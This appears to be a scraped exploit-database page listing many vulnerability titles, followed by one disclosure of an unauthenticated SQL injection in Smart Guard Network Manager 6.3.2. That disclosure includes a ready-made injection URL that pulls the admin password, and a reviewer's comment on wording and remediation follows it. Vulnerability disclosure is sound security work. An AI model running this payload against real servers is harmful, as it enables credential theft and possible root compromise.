
7 new exploits Microsoft Internet Explorer 9 IEFRAME - CSelectionInteractButtonBehavior::_UpdateButtonLocation Use-After-Free (MS13-047) Xitami Web Server 5.0a0 - Denial of Service OpenSSL 1.1.0a/1.1.0b - Denial of Service Serva 3.0.0 HTTP Server - Denial of Service iOS 10.1.x - Certificate File Memory Corruption OpenBSD 4.0 - (vga) Privilege Escalation OpenBSD 4.0 - 'vga' Privilege Escalation 10-Strike Network File Search Pro 2.3 - SEH Local Buffer Overflow MyBloggie 2.1.4 - (trackback.php) Multiple SQL Injections MyBloggie 2.1.4 - 'trackback.php' Multiple SQL Injections AShop Deluxe 4.x - (catalogue.php cat) SQL Injection AShop Deluxe 4.x - 'catalogue.php' SQL Injection HIOX Banner Rotator 1.3 - (hm) Remote File Inclusion HIOX Banner Rotator 1.3 - 'hm' Parameter Remote File Inclusion CAT2 - (spaw_root) Local File Inclusion CAT2 - 'spaw_root' Parameter Local File Inclusion MyBloggie 2.1.3 - search.php SQL Injection MyBloggie 2.1.2/2.1.3 - upload.php Multiple Parameter Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - delcomment.php Multiple Parameter Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - deluser.php 'id' Parameter Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - addcat.php errormsg Parameter Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - edituser.php errormsg Parameter Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - adduser.php errormsg Parameter Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - editcat.php errormsg Parameter Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - add.php trackback_url Parameter Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - delcat.php cat_id Parameter Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - del.php post_id Parameter Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - 'upload.php' Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - 'delcomment.php' Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - 'deluser.php' Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - 'addcat.php' Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - 'edituser.php' Cross-Site Scripting MyBloggie 2.1.2/2.1.3 
- 'adduser.php' Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - 'editcat.php' Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - 'trackback_url' Parameter Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - 'delcat.php' Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - 'del.php' Cross-Site Scripting MyBloggie 2.1.x - Multiple Remote File Inclusion MyBloggie 2.1.x - MyBloggie_Root_Path Parameter Multiple Remote File Inclusion MyBloggie 2.1.x - 'MyBloggie_Root_Path' Parameter Remote File Inclusion AShop Deluxe 4.5 - ashop/catalogue.php Multiple Parameter Cross-Site Scripting AShop Deluxe 4.5 - ashop/basket.php cat Parameter Cross-Site Scripting AShop Deluxe 4.5 - ashop/search.php SearchString Parameter Cross-Site Scripting AShop Deluxe 4.5 - shipping.php Multiple Parameter Cross-Site Scripting AShop Deluxe 4.5 - admin/editcatalogue.php cat Parameter Cross-Site Scripting AShop Deluxe 4.5 - admin/salesadmin.php resultpage Parameter Cross-Site Scripting AShop Deluxe 4.5 - 'catalogue.php' Cross-Site Scripting AShop Deluxe 4.5 - 'basket.php' Cross-Site Scripting AShop Deluxe 4.5 - 'search.php' Cross-Site Scripting AShop Deluxe 4.5 - 'shipping.php' Cross-Site Scripting AShop Deluxe 4.5 - 'editcatalogue.php' Cross-Site Scripting AShop Deluxe 4.5 - 'salesadmin.php' Cross-Site Scripting MyBloggie 2.1.5 - 'index.php' PATH_INFO Parameter Cross-Site Scripting MyBloggie 2.1.5 - 'index.php' Cross-Site Scripting MyBloggie 2.1.5 - 'login.php' PATH_INFO Parameter Cross-Site Scripting MyBloggie 2.1.5 - 'login.php' Cross-Site Scripting Smart Guard Network Manager 6.3.2 - SQL Injection WordPress Plugin Multisite Post Duplicator 0.9.5.1 - Cross-Site Request Forgery
# Exploit Title: SQL Injection In Smart Guard Network Manager Api
# Date: 03/12/2016
# Exploit Author: Rahul Raz
# Vendor Homepage: http://www.xsinfoways.com/
# Software Name: Smart Guard Network Manager
# Version: 6.3.2
# Tested on: Ubuntu Linux

Vulnerability type: CWE-89: Improper Neutralization of Special Elements
used in an SQL Command ('SQL Injection')

The menu_id GET parameter on <base url>/view_logs/search_all_history.php in
not filtered properly and leads to SQL Injection

Authentication Required: No

SQL injec type- error/xpath.

Any unauthenticated user can inject SQL commands on the <base-url>
/view_logs/search_all_history.php?menu_id=-466 and extractvalue(1,(select
make_set(511,0,SUBSTRING(password,1,20),1) from
login_master limit 0,1 ))-- -

So an user can fetch admin details and can easily get root on that server
if server is SmartGuard 6.0A Revolutions as php runs as user root by
default.
This this vulnerability can make whole server vulnerable .
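
Review bot: the affected-version statement is inconsistent between the header and the impact paragraph: the header gives "Version: 6.3.2" while the last paragraph conditions the root claim on "SmartGuard 6.0A Revolutions" without saying how the two relate, so the entry should state the affected product and version range explicitly. In the description, "search_all_history.php in not filtered properly" should read "is not filtered properly", "SQL injec type" should be spelled out, and the closing line repeats "This this". "Date: 03/12/2016" is ambiguous between day-first and month-first; an ISO 8601 date would remove the doubt. The entry also carries no remediation line: since the flaw is menu_id reaching a SQL statement unfiltered, a short note recommending integer validation of menu_id and a parameterized query, and pointing out that PHP running as root is what escalates a database read to full server compromise, would make the record usable by defenders.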